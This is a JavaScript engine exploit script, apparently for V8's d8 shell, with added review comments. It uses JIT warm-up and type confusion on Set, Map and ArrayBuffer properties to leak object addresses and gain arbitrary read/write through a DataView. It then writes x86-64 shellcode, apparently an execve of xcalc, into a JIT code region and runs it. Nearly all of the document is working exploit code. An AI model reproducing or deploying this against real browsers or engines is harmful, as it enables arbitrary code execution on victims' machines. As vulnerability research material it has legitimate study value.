/**
 * Scratch buffer for reinterpreting the same 8 bytes as a double or as two
 * 32-bit halves. The value 64-bit value is carried in a Number, so anything
 * above 2^53 loses precision.
 */
class Memory {
  constructor() {
    // One 8-byte buffer, three views onto the same bytes.
    this.buf = new ArrayBuffer(8);
    this.f64 = new Float64Array(this.buf);
    this.u32 = new Uint32Array(this.buf);
    this.bytes = new Uint8Array(this.buf);
  }

  /**
   * Read the bit pattern of a double back as hi * 2^32 + lo.
   * @param {number} val - the double whose bits are wanted
   * @returns {number} the 64-bit pattern as a Number (little-endian word
   *   order assumed: u32[0] is the low word)
   */
  d2u(val) {
    this.f64[0] = val;
    const [lo, hi] = this.u32;
    return hi * 0x100000000 + lo;
  }

  /**
   * Write a 64-bit pattern (held in a Number) and read it back as a double.
   * @param {number} val - the bit pattern to store
   * @returns {number} the double with that bit pattern
   */
  u2d(val) {
    // parseInt on a Number goes through toString(); kept as the original does it.
    const lo = parseInt(String(val % 0x100000000), 10);
    const hi = parseInt(String((val - lo) / 0x100000000), 10);
    this.u32.set([lo, hi]);
    return this.f64[0];
  }
}
// `var` kept: later statements in this script reference `mem` as a script-level binding.
var mem = new Memory();
/**
 * Combine the first eight UTF-16 code units of str into one little-endian
 * 64-bit value held in a Number (bits above 2^53 lose precision).
 * @param {string} str - the string to read; fewer than eight code units yields NaN
 * @returns {number} code0 + code1 * 2^8 + ... + code7 * 2^56, summed in that order
 */
function leak_string(str) {
  let acc = 0;
  let weight = 1;
  for (let idx = 0; idx < 8; idx++) {
    // Each weight is an exact power of two, so the products are exact;
    // summation order matches the original left-to-right expression.
    acc += str.charCodeAt(idx) * weight;
    weight *= 0x100;
  }
  return acc;
}
// Creates a fresh Set and stores it in the undeclared script-level name `n`
// (an implicit global; this assignment would throw in strict-mode/module code).
function Ctor1(){ n = new Set(); }
// Creates a fresh Map and stores it in the undeclared script-level name `m`
// (an implicit global, as in Ctor1).
function Ctor2(){ m = new Map(); }
// Creates a zero-length ArrayBuffer (no byte length passed) and stores it in the
// undeclared script-level name `l` (an implicit global, as in Ctor1).
function Ctor3(){ l = new ArrayBuffer(); }
// Adds four properties to the global `n` in a fixed order: a specific small
// double, 0, 0x1000 and the caller-supplied obj. The exact values and the
// order of the writes are what the rest of the script relies on.
// NOTE(review): these constants read as an engine-build-specific layout
// assumption; confirm their meaning against the target engine before reuse.
function Check1(obj){ n.xyz0 = 3.4766863919152113e-308; n.xyz1 = 0; n.xyz2 = 0x1000; n.xyz3 = obj; }
// Same four-property write as Check1, but on the global `m` and with the
// final slot taking a number rather than an object.
function Check2(val){ m.xyz0 = 3.4766863919152113e-308; m.xyz1 = 0; m.xyz2 = 0x1000; m.xyz3 = val; }
// Two-property variant on the global `l`: the same fixed double, then the
// caller-supplied number. Value and order are relied on by later statements.
function Check3(val){ l.xyz0 = 3.4766863919152113e-308; l.xyz1 = val; }
// Trivial function called 10000 times up front; later statements read its
// address via leak_string and call it once more at the very end.
// `var i` is hoisted to script scope and reused (without redeclaration) by the
// final shellcode-copy loop, so it must stay a `var`.
function func() { return 0; } for(var i = 0; i < 10000; i++){ func(); }
// Warm-up: run the three constructors 10000 times.
for(var i = 0; i < 10000; i++){ Ctor1(); Ctor2(); Ctor3(); }
// Warm-up of the property writers with placeholder values (null and the same
// fixed double used inside them).
for(var i = 0; i < 10000; i++){ Check1(null); Check2(3.4766863919152113e-308); Check3(3.4766863919152113e-308); }
// A 0x100-byte ArrayBuffer and a String wrapper object around "null".
var ab = new ArrayBuffer(0x100); var str= new String(null);
// Fresh n, m and l for the real run.
Ctor1(); Ctor2(); Ctor3();
// After Check1(ab), the first 8 code units of `str` are read as a number and
// 0x20 is added. NOTE(review): treating a String's characters as an address is
// only meaningful if the preceding writes disturbed engine memory — that is
// inferred, not visible here. ab_addr/ab_backing are implicit globals.
// `print` is not a Node or browser global; presumably a JS-shell builtin.
Check1(ab); ab_addr = leak_string(str); ab_backing = ab_addr + 0x20; print("[*]backing store: 0x" + ab_backing.toString(16));
// Same read for func; the -1 and +0x38 adjustments are fixed offsets
// (engine-build-specific, presumably). func_addr/code_entry are implicit globals.
Check1(func); func_addr = leak_string(str)-1; code_entry = func_addr + 0x38; print("[*]func address: 0x" + func_addr.toString(16));
// Store the two computed numbers as doubles (via mem.u2d) into the last slot
// written by Check2 and Check3.
Check1(String(null)); Check2(mem.u2d(ab_backing - 0x8)); Check3(mem.u2d(code_entry));
// Read the first 8 bytes of `ab` as a little-endian double and convert the bit
// pattern back to a number. dataView/rwx_area are implicit globals.
dataView = new DataView(ab); rwx_area = mem.d2u(dataView.getFloat64(0, true)); print("[*]rwx_area: 0x" + rwx_area.toString(16));
// Write rwx_area through Check3, then define an array of raw 32-bit words that
// the loop below copies into the buffer verbatim.
Check3(mem.u2d(rwx_area)); var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
// Copy each word to offset i*4, little-endian; reuses the hoisted `var i`.
for (i = 0; i < shellcode.length; i++){ dataView.setUint32(i * 4, shellcode[i], true); }
// Final call of the warmed-up function.
func();